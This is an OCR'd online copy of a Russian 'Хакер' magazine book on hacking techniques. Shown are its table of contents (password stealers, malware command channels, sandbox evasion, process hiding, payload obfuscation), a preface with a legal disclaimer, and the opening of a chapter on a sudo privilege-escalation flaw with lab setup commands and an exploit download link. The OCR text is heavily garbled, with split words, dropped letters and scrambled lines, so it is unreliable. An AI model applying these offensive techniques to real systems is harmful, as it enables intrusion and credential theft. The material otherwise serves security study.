Взлом. Приемы, трюки и секреты хакеров [Коллектив авторов] (pdf) читать онлайн

Библотека

-U.нЕР

111111111

журнал

li..

www.xakep.ru

ПРИЕМ

ЬI

ТРЮК

,

И
и

CEKPETbl
ХА

ЕРО
Сан

« БХВ

кт-

В
Пе

- Пе

т ербуг
т ербуг

2020

»

БК

УДК

004
32.973
840

Взлом

. Приемы,

840

с.:

трюки

ил.

192

и

(Библотека

секрты

хакеров.

журнал

СПб

-

« Хакер

. : БХВ-Петрбуг,

2020. -

» )

ISBN 978-5-9775-6633-9
В
и

сборнике

избраных

эксплуатци

стаей
уязвимостей,

ния

процесами

в ОС

о ется

спобах
щим

Даны

я

из

чита

ел

описан

технолгия
»

и

ей

, инт

драйве

и

Chrome

Firefox.

ющи

Описаны

инф

о р ма

ци

ядра

создания

стилера

приемы

в з лому

:хся

управляю­

режима

WinAPI,

посвящены

е р есу

Раскзыв­
и

напися

разделы

управле­

маскиров.

черз

браузеов

поиска

антиолдк,

прогами

приложеням

PowerShell. Отдельны
Дл

»

вредонсыми
примеы

управления

паролей
кода

между

конреты

перхват

получения
ци

« Хакер

Microsoft Windows и их
даными

сервом.

для

журнал

« песочниц

семйтва

обмена

Windows,

из
деткированя

iPhone

о н ой

б езо

па

с н ос

обфуска­
и

Apple Watch.
тью
УДК
БК

Гpyna
Руков

д итель

Зав.ре

изданя:

проекта

Пав

ел

Ек

а т е рина

д акцией

Компьютерная
айн

Формат

об

Подписан

х 10

1

Тираж

"БХВ-Петрбуг'

~,
-;:а"

/ , 6 . Печать

в

800 экз
, 191036, Санкт-Пербуг
Отпечано

и

Кари

л ожки

70

Ш

О льг
верстка

Д из

ISBN 978-5-9775-6633-9

подгтвки

в

ОА

«Можайски

143200, Росия
www .oaompk.ru , тел

004
32.973

, г. Можайск

печать

а л ин

С а ви с
Се

р г и е нк

н ы

Солвь

е во

04 .06 .20 .
. Усл
. печ
№
5776 .

офсетная
. Закз

т е
о
й

. л . 15,48.

, Гончаря
полиграфческй

, ул

ул

.,

комбинат

. Мира

20 .
».

, 93.

.: (495) 745-84-28 , (49638) 20-685

©

ИТ1

©

О ф ор

Ю

г ай

мле

А.О

ни

,

е . О

2020
" БХ

В-П

ет

е р бург

" , О

" Б Х

В " ,

2020

Содержани

Вместо

........................................................................................................ 7
предисловя

1. Повышаем
Ко

aLLy

Подгтвка
Детали

Принцп

работы
Практичеся

2.

м

ис

ов)

Эксплуатирем

опасную

( Иван

Ко

aLLy

Историчекй

м

исаро

в)

уязвимость
в ярлыках
Microsoft Windows
................................................................................................. 24

э ксур
....... .. .... .. ... ....... ... ...... .. .. .......... ..... ..... .. ....... ..... ............ ..... ............ ... ..... ..... .24
........ .. .... ....... ... ... ......... ..... .. ... ... ........ .......... ..... .... .... ....... .......... .... ..... .. ..... .. ........... ..... .... ........ 25
л инковая
................... ................. ...... ... ........... ........................ .. ...... ..... ........ ..... .... 26
т и э кспл
у атци
.... .... ... .. .... ...... .... .... ........ ....... .... ....... ............. ............ ........... ...... ........ 35
запускть
...... ...... .... ..... ......... ... ......... .. ... ..... ........ ....... .... .... ...... .. ... ............ ...... ..... ......... ... .... 39
о патче
.................. ......... ... ... .... ......... ...... ....... ....................................... .. ......... .. .. ........... ....43
....... ....... .... ... .. ...... ............. ... ...... ..... .................. ....... ..... .. ....... ....... .... ....................... ... ....... 43
Стенд

Особенти

Особен
Время
Кратко
Вывод

3.
Разбирем

метод

черз

общения

аноимые
серви

Канл

связи
Регистраця

Автори

з
П у бликаця
Канл

свя
Выво

д ы

4.

вопрс

завершния

вы Обфускация

з ов

д и те

т овка
Спосбы

т ве

сервом

отве

(Г е р м

а н

Н амес

тник

ов)

............... 44

т ов

WinAPI
вызо

Спосбы

ои

и

..... .. ....... .. ................... .. ......... .. .... .. .... .. ............... .. ...... .45
« операт
- бо т» .... ..................................... ... ..... .. ............... ... ......................... .. .. ... 46
... ... ... .... ............. ... ... ..... ...... ............. ... ... ... .. .... ..... ............... .......... ... ..... ........ ... ... .. ....... 46
ация
... ...... .......... ....... ..... ... ..... ...... ............. ... ... ..... .......... ........ .. ................. ........ .. ... .. ...... .... 48
информац
дл я бо т ов ..... ...... ... .... ...... ......... .... ......................... ........... ...... ... ...... .... .49
з и « бо т - опера
т ор » ... ..................... .. ............. .. ...................................... .. ........... .. ....... 50
... ........... ..... ...... ........ ..... ... .. .... ... ............. .... ... ....... .... ... .... .... .............. ... .. ... ..... ... ....... .... ... .. . 53

Обфусцирем

д го

с управляющим

вопрс

с ы

принудтельог
Прину

малври

сервиы

Аноимые

Заключени

с ар

..... .......... .. ...... ........ ... ... .... ........ .... ..... .... ........ ........... .......... ... .... ....... .. ............ .. ..... ..... .. 1О
.............................. ..... ............. ..... ... ... ............. ................... ...... .... .................... 12
э ксплоита
.. .. .. .................. ....... .. ..................... ... .. .. .. ..... .... .................................. 15
э ксплуатция
и повышени
прив
ил еги
й .......... .. .................... ........ .. .. .. ....... .. .......20

уязвимост

По

до
суперользватя
черз
уязвимость
в sudo
................................................................................................. 10

привлег

( Иван

льное

процесв

и

изучаем

спобы
в

Windows (Nik Zeroj) .......................... 54

WinAPI .... .... .. .. ..... ................ ....... .... .. ... .......... ... .... ........ .................. ....... .... 54
процесв
...... ............. ............................. .................... .................. 62
............. .............. ... .... ......... ......... ...... .................. ............. ............... ...... ..... ............. ... .. 63
з авершния
процесв
....... ......................... ..... .... ....... .... ... .... ....... .......... .. ..... .... .... 66
з авершния
п от окв
.... ....... ........ ... .. ...... ...... .......... ........ ..... ... ... ..... .. ....................... 71
.......... .. ....... .................. .... ... ... ..... .. ....... ... .... .......... ... .... ....... ...... .. ................. ..... .. .. ..... .. 74
завершни

0--4--0

5. Пишем
стилер.
Как
вы
т ащи
т ь па
ро л и Chrome и Firefox своим
руками
(Nik Zeroj) ......................................................................................................................... 75
Chrome ...... .......... .............. ..... ..... ....... ... ....... ..... ... ...... ........................ .... ... .. .. ...... ..... ..... ... ... .. .. .. .. .. ..75
Firefox ........ .. ....... ............ ......... .. ..... ... .. .. ................ ... ............................. ........... ...... .... .. .. ........ ..... ... 80
Network Security Services (NSS) ....... ........ .... ... ..... ..... ..... ... .. .... .. ...... ......... ...... ...... .... .. .... ...... ...... ... 81
Заключ
е ни
е ... ........... .................. ...... .... .. ..... ...... ..... ................... ...... ... .... ........... ...... ....... .... .... .... ..... 83

6. Детк
в

песочницы.

Учимся
запущены

е

е м

Че

л ов
РЕВ
Выясн

Пров
Прос
Быстр
ключени

в

я ть

, работе

л и

приложен

п роцесы

... .. ...... ... ................. ........................... ... ................ ... ... ... .... ..... 84
наш
е м а д ресном
простанве
..... .... ........ .... ... ... ....... ..... 85
е ч е ск ий
фактор
... .... .... ..... ............. ...... ...... ....... ..... ... ............ .................. ........ .... .. .... ... ..... .... 86
I NumberOfProcessors ........ .......... ... .. .... ... ... ...... ... ... ... ........... ...... ... ... .... ..... .. ......... .. ... ... ..... .... .87
ем
р азме
ор
п еративной
памя
т и ..... .... .... ....... ........ ............. ... .... ........ ........... ... .... .. ... .... ..... 87
е ря е м с во бо д н ое
место
........... ....... ... ... .. .. ....... ... .................... ......... ........ ...... .... .. .. .... ... ...... ... 88
т ы е тайминг-к
..... .... ................ .... .... ........ .......... ........ ... ......... .... ... ..... ........ .... ....... ... .... ... . 88
й дет
к т гипе
р визор
..... ..... ... ... ... ..... ........ .... ... .... .......... .... ... ........... ... ...... ........ ......... ..... 89
... .. .... ...... ... .. ... ........ ........... ........... ..... ......... ... .... ..... ... ..... ....... ............ ........ ... ... .......... ... 90

Провея

7.

едл

(Nik Zeroj) .................................................................................... 84
sаndЬох-изляц

Провея ем

За

о пр

Учимся

п одключены

е

создав

т ь

и

прин

мо

дул

уд

ви

ит

ел

ьно

з авершть

критчные

процесы

Windows (Nik Zeroj) ..................................................................................................... 91

Rt\SetProcesslsCritica l ........ ... ..... ............... ... .... ... ................. .... ... .. .... ... .. .............. .... .... ..... ........ .... .92
NtSetlnformationProcess ... .......... ......... ..... ........ ........ ........ ........ ..... ........... ........ ..... ..... .... ..... ... .... ... .93
Провека
кр итч
н ости
п роц
е с с а ...... ... ... ......... ..... .................. ......... ... .... .... .... ...... .... ... ... ..... ... ...... 94
Выво
ды
..... ..... .. ..... ... .. ..... ... .... ..... .... ....... ...... ... ............ .. ... ..... .. ... ... ... ... .. ... .... ..... .............. ... .. ...... .... .95

8. Как
перхваты
т ь у прав
лен
и е л юбо
й прогам
м о й чер
з WinAPI
(Nik Zeroj) ...............................•.....................................•.•..............................................•.. 96
Каки

е

Поч

ему

ва

хуки

Сплайсинг
Пр
Б
Те
Инж
Итоги

..... ...... .. .. .... .. ......... ..... ............... .... ... ........ .. ............... ..... ...... ... ..... ... ........ .. ...... 96
? ......... .... .. .. ..... ............ .................................... ........ ...... ... .. ...... ...... ....... .... 96
ф ункций
Wi nAP l ......... ..... .. .. .......... ... ........... ... .. ..... ........... ... ... ............ ....... ...... .... .. .. ... 97
олг
ф ункций
, трамплин
и диз
ас
ем
б л ер
дл ин
инстр
у кций
.. .... ...... ... .. ..... ........... ......... 97
иблотек
для
перхват
а ...... ..... ......... ......... ...... .. ...... ....... ......... ... ........... .... ... ....... ..... ....... ..97
сто
вое
пр
иложен
.. ...... ... .. ........ .. ... ... .. .. ... .... .... ...... ............... ..... .... .......... ...... ..... ........ .... .98
ектор
.... .. ..... ... .. ...... ... .... ......... ....... ..... .. ......... ....... .. .... ... ..... ........ .... ...... ..... ... ..... ...... ....... 101
... ...... .... ............ .... .. .......... ...... .... .. ..... .... ...... .... ..... ................... ... .... .... .. .... ..... .. ..... ... ...... ....... 103
б ы

ю

т

хуки

р аботю

9. Антиоладк.
Теория
и прак
ти
к а з ащиты
приложенй
от
д ебаг
(Nik Zeroj) ....................................................................................................................... 104
lsDebuggerPresent() и ст р уктра
РЕВ
.... .. ............ ..... ....... .......... ......... ..... .. .... .... ....... .... .... ... ..... .. 104
NtG\oba\Flag .. ........... .. ... ..... .. ... ... .. ............ ........ ... ..... ... ... ...... ..... ...... .. ..... .. ... ..... .. .......... ...... ......... . 105
Flags и ForceFlags ................... .... ..................... .. ...... ... .. ...... ............. .. ... .. ... ....... .. ...... ........ ............ 105
CheckRemoteDebuggerPresent() и NtQuerylnformati onProcess ........ ...... .......... ..... .. .... ..... .... ...... 106
DebugObject ....... .. ........ .. ......... ... .... ..... ....... .. ....... .. .................. ............... ... ......... ...... .... .... .... .... ..... l 07
ProcessDebugF \ags .... ..... .......... ..... ......... ........... ..... .......... .... ....... ... ... ..... ...... ................... ..... ...... ... 108
Провек
а ро дител
ь п ског
р оцеса
....... ... .. .................... ...... .......... .. ... .... .. ..... ..... ......... .... .... ... .. .. 108
TLS Callbacks ..... ....... .. ..... .. ................. .. .... .... ... ...... ... ............ ............. .. ................. .............. .. ....... 109
Отла
д очны
е р ег и
ст р ы .... ... .... ... ..... ...... ......... ....... .... ..... ................ ..... ....... ... .. .... .. ...... ... .. ............. 109

□

-5

□

NtSetlnfonnationThread ............. .. ........ .......... ... ................ ... ........... ...... .... .... ....... ........ ....... ... ....... 110
NtCreateThreadEx .... ... ........ .............. ........ ... .......... ..... .. ........ ........ .... .... ....... .... ..... .. ....... ..... ...... .... 11 О
SeDebugPrivilege ..... ..... .. .... ...... .......... .. ... ... .. ............................ ... .. ........ ........... ............ ............. ... 1 1 1
SetHand
l elnfoatiп
.. ................... ...... ....... .. .......... ...... .... ................... .. .. .... ..... .......... ... .. ..... .... .... 111
Заключени
.... ...... .... ... ................. ..... .. .. .. ... ............. ........ ............ ... ...... ...... ..... ... .. .... ...... .. ............. 112
Как

10.
и

с делать

скрыва

свой
ть

Создание

драйве

процесы

режима
ядра
Windows
(Nik Zeroj) ............................................................................... 113

драйве

KMDF .... .......... .......................................... ........ ..... .. .... ....... .............. .... ... ... 114
.......... ...... .... ...... ............. ... .................. ...... ........ .. ........ ..................... 114
Interrupt Request Level (IRQL) ................ .......... ....... ... .. ... ..... ......... ...... ..... .... .... .... ...... ......... 115
Пакеты
запрос
вода-ы
да
(Iпput/O
Request Packet) ..... ........... .. .... ...... .. ............. 115
Создание
устройва
драй
в е ра
............ .... .. ... ... ...... ... .. ......... ... ........ .. ....... ............ ............ ... 116
проuесв
ме тодм
ОКМ
(Direct K erп
l Object Manipultoп)
.... .. ...... ......... ..... .... 117
драйвео
...... ... ........... ..... .. .. ... ................. .... .... ...... .. ...... ... ... .. .... ... .. .... .. ....... ... ........... . 12 1
...... .......... ........ .. .. .. .. ... ........ ... ....... ................... ..... .. .......... .. ..... ...... ...... ............... ........ .......... 123
Точка

Скрытие

вхо

Загрузчик
Итоги

да

в драйве

11. Маскир
уем
запуск
процесв
при
помщи
Process Doppelganging
(Nik Zeroj) ....................................................................................................................... 124
Различя

g ................. .... .... .. ....... .... ....... .... ....... ..... .. 124
N T API ...... ... ..... ... ... .... ........ .. ... .... ......... .. ... .... .... .. .. 125
к работе
................... ............ .. .......... ........ ...... ....... ... ...... .... .... ........ ... .. ......... ..... ... .... 126
................ ............ ............. ................................... ..... .. ...... .... ... ...... .. .... ......... .............. 13 1

Process

Как

пользватся

Dopel

ga

недокум

Приступаем
Заключени

п g iп g

ент

и

Process

иров

Holwiп

а ными

12. Фаз
з инг
: автоми
зируем
поиск
уязвимостей
в прогамх
(Nik Zeroj) ....................................................................................................................... 132
Техник
Типы

фазеров
Форматы
Аргументы

Запросы
Сетвы

Бра
Оперативня
Проблема
WiпAFL
MiпFuz
Практи

Заключени

13.

.............. .. ... ... .................................. ....... .. ....... ............ ................... ........ .... ............ ..... .. ... 132
.... ... ... .............. .. .. ........ .... ... ........ ........ ........ ........................................ .... ....... ....... 133
файлов
.... ......... .. ..................... ..... ..... .... .................. ... .. .. ... ... .... ..... .... ........ ... ....... .. 133
коман
д но
й строки
пер и
емны
окружения
.. ................. ....... .. ..... ..... ....... ... 134
IOCTL ................... .............. ....... .......... ...... .. ..................... ........ .... ... ....... ... ...... ... ... 134
протк
л ы ....... ....... .... .. ..... .. ...... .... ....... ..... ........ ... ......... ...... ...... ........... ............. ... .. 134
узерны
д ви жки
.. .... ... ........ ... .......... ... .... ....... ..................... ............ ........... .... ....... .. ... .. .... 134
памя
ть ... ....... .. ....... .... ...................... .. ... .. .... .......... ... ...... ...... .. .. .... .. ..... ... .. ... ... .. 134
покры
тия
... .................................... ............ ... ......... ...... .. ... ... .. ..... ... ...... .. .. .... .. ... ........... 135
...... .................................................................. .... ...... .... .... .. ........ ... .. .......... .. ......... .. .... ..... 135
.... .... ..... ... ..... .. ......... ..... .... .... .. ......... ........ ..... ...... ... ..... ....... ...... ..... ...... ..... ........... ..... ........ 137
...... .. .... ..................... .... ...... ..... ... ............ ................ ... ...... .. ... .. .... .. .... ....................... ....... 138
.. ...... ............. .......... ............... ... ..... ... ... ..... .............. .... ............ .. .... .... ...... ....... ... .... ...... 140

PowerShell.
Обфускация

Как

спрятаь

полезную

нагрузк

••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••• 141
....................... .. .. ..................................................... ... ... ...... ..... .. ... ..... ... .. .... 141
PowerShell в хакинге
Обфускаuия
PowerShell . Пр ят ки с антивр
усом
.. ........ .... ... ........ ................. ..... ........... ............. 142
Автомаизруе
обфускаuию
.................... .... ......... ... ... .. .... .... ....... ... ........ .. ........... .... ......... ... ... .. 145
DOSfuscatioп
....... ........................ .......... ... .. .. .. .... .. ......... .. ....... ....... ... .... .. ........ ........ ......... .. .. ...... .... 147
Реакция
антиврусо
...... ..... .......... ... ........ ...... ..... ... .............. .... ... ..... ... .. .. ... .... ... ..... .... ........ ... ...... 148
Выво д
.. ....... .. ................. ............... .. ....... .......... .. ... ........ ... ......................................... ........ .. ....... . 149
от

глаз

антиврус

(Айгуль

Саи

1п г ачи1-)

□

14.
к

Как

устройв

Это

ли Установле
Джейлбрк

з вес

т

Экран
Включен
В

ка

их

Как

рабо
Режим

Что

дел
Заключени

15.
Извлекам

и

Почем

у
Анализ
Промежу

Изв

л ечни
По
Анали
Доступ

Выво
Дос

ту
Заклю

Предмтный

n
ч

«Хакер»:

□
по

(Олег

А ф

шагм

о н и н )

вс

е

варин

т ы

д ост

у па

.....•................•................•...•.................... 150

....................... ... ............. .. .... .. ....... .. ...................................................................... .. .. . 151
ли
ко д б л окирв
? .. ...................... .. .......... .. ... .. ........... .. ... .. .. .... ... ...... .. ............ .. .... . 151
пароль
на
резвную
копию
? .. ...... .. .. .. .......... .. .. .. ............ .. ...................... .... ...... 151
и фи
з ическо
е из в л еч е ние
да ны
х .............................................. .. ......................... 153
л иен
ко д б л окирв
? .... .................................. ...... .. .......................... .. ...... .. ................... 155
у стройва
з аб л окирв
ан
ил
р азблоки
ро ван?
.............................................................. 155
iPhone и л и вык
л ючен
? ............................ ...... ......................................................... .. ... 157
с лу
чая
х м о ж но
в зл ом
ать
к бло од
киров
ки
э кран
а ........................ ............ ...... .... .. .. ..... 159
т ает
в з лом
к ода
б л окир
о вк и
.......... .... .............. .. .......... .. .. ...... .. ..................................... 160
USB Restricted Mode ......................... ........ .. .. .... .... .. ...... ........ ......... .. ...... ........ .. ............. ... 160
ать
, ес л и тел
фон
з аб л о к ир ова н
, с лом
ан
ил
его
восе
н ет ............................ .. .. .. ...... 162
........... ....... ....... .... ................................ ............ ... ...... ... .. .... ....... ..... ... ..... ........ .......... .. 162

завист

Установле

И

iPhone. Разбирем
с iOS

взломать

даным

-6

анлизруем

даные

Apple Watch
(Олег

А ф

он

ин)

................... 164

Apple Watch? .................... ................ ......... ............. .. .... ...................... .. ......... .. ..... .......... 164
ре з ервной
копи
iPhone .. .. ........ .... ........................ .. .............. .. ........ .. .............. .... ...... ..... 165
т очные
итог
........... ....... .. ......... .. .............................. .. .. ............. ..... ....................... .. .... 174
д аны
х из
Apple Watch че р ез ад п те р ...... .. .. .... .. ..................................... .... ... .. ..... 175
д ключ
е ни к е
ко мп
ью
те р
у ... .. ... .... .......................... ...... .. .. ........ ... ..................... .. ... .. .... ... . 175
з л ог-ф
а й л ов
час
о в .... .......... .......... .. ...... .. ...... .. ... .. ...... ........ ... ...................... .. .... .. .... .. 180
к ме
д иафйлм
.. .. ...... .. ......... .. .. .. ... ...... .... .... .............. .. ............. .. .... .. ......... .... ........ .. 182
д ы ..... .. .. .. ........................... ............ .. ........ ........... .... ....... ... ... ... ... ...... .......... ..... .. .. .......... 185
чер
з о б лако
........................... .. ....... ... ....... ..... .... ............... ........... .. ...... ...... ..... ................ 185
ени
..... .... .. .................. ..... ........................ ........... ...... ..... .... ......... ... ... ..... ..... .......... .. ....... ... 186
безопаснть,
указтель

разботк,

DevOps .......................................................... 187
.............................................................................................. 190

Вместо

предисловя

Ты

держишь

в

справочник

руках

по
чающя

в

нет

необычую

книгу

информацй

себя

. Перд

не

традицоный

безопаснти

информацю

без

сборник

из

самоучитель

и не

, котрую

тобй

публикацй

. Это

скучная

осбг

тщаельно

энциклопедя,

труда

журнал

вклю­

можн

отбраных

легндаро

отыскаь

, самых

«Хакер»,

ил
в

интерсых

Интер­

, лучших

объединых

общей

темой:

«ВЗЛОМ».

В

этой

книге

почти

приложенй.

нет

Ты

устройва

не

теори
и

приемы

взлома,

пытане

в
раз,
ки

из

в

Интер

написвшего

это

я

издательсво
раз

.

недоумвают

отвечаю

происхжден
возмжн:

сетког

технолгичск
глао

словечк

тяжелым.

из

упорствм

постуавших

защиешь

в

чем

в

не

хаке­

виноаты»,

всякий

-

не

процесы

,

работы
то

есть
технолгий,

и

Настоящие
уж

«взламыть»,

прошлг

ка

70-х

это

«хакерми»

столеия.

те

прежд
самые

всего

хип

, где

сейча,

раз

и

а

назывли

в
,

парни

кто

происхдяще
прогами­

, настоящие
в

. Впрочем

«со­

тех,

понимает
иследоват

косматые

муравье

Бы­

жаргон

считаея

ка
, глубок

это

поджигать

учены

очках,

сквозь

, довльн

толсые

часто

среди

них

девчонки.

хакеры
и

годах

не­

Масчу­

IТ-специалтов

-

можн

встречаюя

60-х

уже

аудиторях

из

компьютерв

Хакеры
высоких

, установиь
и

высокалифцрнх

, разботчикв.
котрых

в

наверо

кампусх

компьютерщив

, в

принцы

,
в

обихд

Собствен

« врубается»

мира

сейча
ещ

в

отнюдь

«врубаться».

наживы

дан­

оты­

чем-нибудь

строки
ни

«Баз

хочется

голве

таким

зародилсь

поал

означл

«to hack»

из

он

универста
, что

ображть»,

стекла

самое
заголв­

ил

нестрпимо

по

они

«хакер»

, что

мнеи

стов

с

что

есть

новстые
атку»

подбные
ты

термина
предолагтся

них

его

«Потму

и

я.

Истиное

туе

стукнь

«Почему

колеги.

-

вижу

мне

вымарю

материлов

ров?»

я

вирусню

хакерми»,
и

ис­

Это

СМИ

безжалостн

практиче­

виде.

очердную

похищена

,

многкрат

концетривам

традицоных

журналист

редактом,
в

,

организвл

была

тольк
и

информаця.

истном

и

прогам

собраны

полезная

его

ил

«Хакеры

Работя

облжкй

тольк
в

интер-магз

скать

этой

работы

професиналм

«воды»,

когда

разяд

ных

Под

ситем

принцов

настоящим

хакерств

операциных

описанй

даных.

Никаой

искутво

Всякий

баз

долгих

описаные

дел.

настояще

архитеку

здесь

драйвео
ские

, посвященй

найдешь

никогда
тем

боле

не
не

совершали

взламыи

чужие
престулний

приложеня

ил

-

разве

что

порй

сервы

ради
использва-

□-

ли

свои

знаия

вали

для

организц

собтвены

и

можн
и

Стива

Сегодня

расхож

д

сущетвоал

слов

«х

акер

кибер

наосить

ком­

боль

Гейтса

шому

счету,

, Линуса

Торвальдс

человста

рода

электрон

хотя хакером,

­

в

да

обзначвше

прост
до

дыр

его

времна

высокланг

не

разбиющмся

IТ-професиналв
в .

изданя

школьни

Интера

неког

злоде

очень

любой

Била

своег

низвел

и
и не

По

истор

затеро

, котрые

престуников
мнит

был

, оказлсь

журналистм
онлайвые

з е

»,

специалт

ных

и
в

использ­
не

восе.

е

компьютернг

просе

Цу

хакеры

старлиь
вреда.

первой

Конра

не

равно

Возняка

создатель

машины
поняти

все
серьзног

. Даже

вычислтеьной

. Порй

, но

пользватеям

назвть

Столман

таког

целях

их

смело

Ричард

розыгшей

в личных

ситема
хакерми

□

безоидных

умения

пьютерным

8 -

Масл

в

, благодря

огнь

по

старниям

, скачвший

в

доурвня
дл

ил

многчислеы

котрых

откуда-нибь

по

ные

дбо

во­

компьютер­

рку

хаке

ром

« прогам

себя

для

взлома

».
В

мире

ми

сущетв

множеств

IТ-специалтов,

професиналм

своег

щие

целы

кластеры

перты

по
множк

Это
, это

хакеры.

,

Вот

почему

так,

я

с

сложный

отншусь

к

код

, это

операциных
опасные

и

настоящи­

, подерживаю­

иследующ

большим

назвть

, пишуще

архитекоы

анлитк

имено

можн

админстроы е
прогамисты

безопаснти,

вирусные
ваться

дела.

серво

информацй

конеч,

котрых

угрозы.

людям,

И

котрые

искренм

экс­

ситем
все

заслужи

уваженим,

и,

они
право

ведь

хакер

не­

имено­

это

-

звучит

горд.

Авторы

собраных

в

хоршем

смыле
ватели

слова.

делятс

журнале
общаться

с
ютерный

читае

Все
не

а

эти

« ты

Во-втрых

традиц
на

осбенть
в

ко

де».

Поскльу

У

»

тема

так нас

допустим

назвть

«ф

« пофиксть»

компь­

ирончй

и

и
слов

принято

ича

»

вместо

на

книгу.

вместо

шутли­

Потму

«функциоаль­

«исправть

выяленую

заведно.

этой

предислов

ил

, здесь

распотниль

изданя

приложеня

ошибку

мер

уязвимостей.

журнал
можн

полнй

само,

читаель.

страницх

стаьях

страницх

поиска

Во-первых

, на

в

, встреи

с тобй,
атмосфер.

».

том
иследо­

и

опытм

в

добрые

удивляйс
ная

на

информац

неповтримая

изложеня манеру

в

, неутомиы

защиты
и

своя

хакеры

професиналы

сфер

з наиям

лем

сленг,

этичные

истные
в

царит

настоящие

-

Это

своим

«Хакер»

вой.

стаей

э ксперты
они

В

книге

э тог

, опытнейши

Сегодня

в

этой

книг

весьма

несколь

специфчная

важных

, мы

пре

ду

преждний

не

. Вот

може

не

опубликвать

они:

ВНИМАЕ!
Вся

приведная

на

исключтеьно

в
нал

«Хакер»,

ни

пользвания

страницх

этой

авторы

не

вред

неи

, что
вредонсг

несут

, причнеый

никаой
в

результа

любые

прочтения
из

по

закону

публикются
, ни

за

к

примеы

«БХВ»

отвесни

доступ
преслдуютя

и

издательсво

информацей

несакциорвый
ПО

, код

. Ни

полученй

возмжный

Помните

информаця

целях

информац,

бой

книг

ознакмительых

ис­

, а

также

за

изданя.

компьютерны

ситема
. Все

жур­

последтвия
книг

этог

редакция

расмотены

и
в

распот­
книге

методы

лю­

□представлны

в

леную

в
риск

Искрен

надеюсь,

вы

что

ты

для

атомную

бому

и

борьы

пасноти

и

с
выялени

этог
среди

образм

читаель

используя

на

представ­

собтвеный

страх

постяных

,

угрозами

э той

и

можн

и

рет

».

«Взлом» рубик

милоны

сделашь

знаи

я

во

бла­

закрыть

нем
До

безо­

стаей

. Ну

а

будем

я , сота­

рады

видеть

встречи!

Вал.ептин
редакто

ядерной

, ты

книге

нужо

в
« Хакер

любые

же

информацй

опубликваных
журнал

той

. Уверн

, повышения

, котрые

читаелй

сог

их

благодря

компьютерныи

что
и

котрая

уничтожь

обретны

авторы

понимаешь,
однй

электросанцию

используеш

, и

прекасно

использванем

, спобную

уязвимостей

сборника

,
С

сорудить

выбор

витель

Каким-лбо

исключтеьно

, доргй

постриь

можн

правильный

-

.

действу

отвеснь.
можн

, а

го

целях

информацю,

подразумевют

реакци

тебя

ознакмительых

книге

□

.

з наия
людей

9 -

Холмгрв,
: псурал

«Хакер»

http://xakep.ru
http://holmogorov.ru

......
~НЕР

-□

Повышаем

привлег

1.
до

суперользватя

черз

уязвимость

Иван

в

sudo

aLLy Комисарв

Команд

sudo в
команды

от
шли

в

и

UNIX

имен

Уязвимость

LPE,

ситем.

Посмтри

связан
в

все

ошибка

функци

с

котрая

аткующем

это

верси

сылки

,

контес

1 . 8 . 6р7

обратки

он

может

перисать

sudo
черз

­

,

/p roc/ [pidJ /stat

файл

симво­

sudo
команду

на

этог

1.820р

сформиваные

симлнко

содержим

закнчивя

результаов
вызать

терминал

на

повысить

и

специально
может

пользватеский

Qualys
из

работе.

логикй

злоумышеник

Ребята

возмжнсть

sudo, начия

неврой

выполнять

root.
от

get _process _ ttyname () . Используя

лическ

пользватею

частнои

дает

, ка

затргиве

а

в

типа

в

обычнму

пользватей,

sudo уязвимость

привлег

позвляет

Linux

других

нужый

и

подменить

файл.

результаом

в

Таким

работы

е

образм,

выпо

лняемой

команды.

Подгтвка
Начнем

с

выбора

гостевй

операцинй

ОС

си

ситемы.

, поэтму

ситемы.

все

мои

так

Запускть
же, ка

ОС
в

Я

буд

манипуляц

Docker я
черз

полнцем

использват

CentOS 7

будт

актульны

имено

для

SELinux в

не

советую-

дистрбуве.

Лучше

в

качеств
этой

нем

вер­

работе

не

VMware
использват

ил

Virtua\Вox.
Чтобы

протесиваь

уязвимость

Обычнй

1.

пользвате

, нам

с

понадбятс

три

sudо-привлегям

условия:

выполнеия

каой-нибудь

про­

грамы.

2.
3.

SELinux (Security Enhanced Linux).
Активроаный
Сам

sudo
бинарк

должен

быть

собран

с

SELinux
подержкй

(подержка

sudo

-r role).
Разбермся

с каждым
Для

начл

если
вернуть

но

пунктом.

создаим

теб

юзера

следующй

по

каим-то

attacker. Я

командй

причнам
в

такой
консли:

уже

сдела

варинт

это

на

не

подхит,

этапе

устано

вки

то

это

ситемы

можн

,

про­

□-

useradd - d /home / attacker -s /bin/bash
passwd - 1 -stdin ) attacker
Тепрь

делгирум

новиспечму

команду

от

демо

нс т

уязвимост

возмжнсть

буд

выполнять

далеко

использую

от

бинарк

котрый

контр

можн

льной

сумы
же

указног
прост

д обавить

/etc/sudoers

в файл

файл.

(рис

CentOS 7 SELinux

доплнитеьых
стау

этог

.

строчку

репота

занимется

подсчетм

воспльзатя

командй

attacker ALL= (ALL) NOPASSWD : /usrЬinm

1. 1).

включен

и

действи
текущий

Для

каую-нибдь

Qualys и для
sum (https://www.opennet.ru/
отхдиь

man.shtml?topic=sum&category=l&russian=O),
visudo ил
В

Не

□

$(echo verysecretpass I openssl

- р

юзеру

суперользватя.

раци

-

11

вторй

прекасно

работе

подситемы

и
можн

треий

из

пункты

от

командй

корби,
нас

никах поэтму
не

потребую

. Провеить

1.2).

sestatus (рис.

~

Рис.

Cent0S7 - VМwor

1.1. Добавлени

пользватею

прав

на

выполнеи

команды

1.2. SELinux

черз

sudo
о

Worlcst.tion 12 Player

Рис.

х

□

• CentOS7 (Befor• update sudo) [RunningJ - Oracl• VM VirtualBox

работе

в

CentOS

из

корби

х

12
□-

С

подгтвкй

з акончи

ли,

время самое

-

□

скачивть

э ксплоит

https://www.exploit-db.com/download/42183
и

по

перходить

следующй

к

• сылке:

разбоу

д еталй

уяз­

вимост.

Детали

уязвимост
В

само

начле

я

ttyname, котрая
Давй

разбемся
о

под

493:
4 94 :

можн

,

seq_put_decimal_ ll(m,
seq_put_decimal ll(m,
ка

ви

д ишь

,

отделяюtс

get_process_ttyname
дальнейшго

get_process_
функци

. При

выполнеи

номер

терминал

пос

команды
и

читае

, котрый

мотреь

в

она

номер

использует

получает

tty
терминал

парсинг

11

11

11

"

11

"

/usr/src/linux/fs/proc/array.c.
файле

разбивет

[1 2 3]

'
tty_nr) ; [7]
'
tty_pgrp) ;

друг
и

и з

процес

seq_printf (m, " %d (%s) % с ",
pid_nr_ns (pid , ns) , tcomm, state) ;
seq_put _ de c imal 11 (m, " ", ppid) ; [ 4]
pgid ) ; [5]
seq_put_ decimal_l l(m,
'
sid ) ; [6]
seq_put_decimal_ll(m,

495 :
496:
497 :
498 :
Поля

stat

в

/proc/[pid]/stat
1.3).

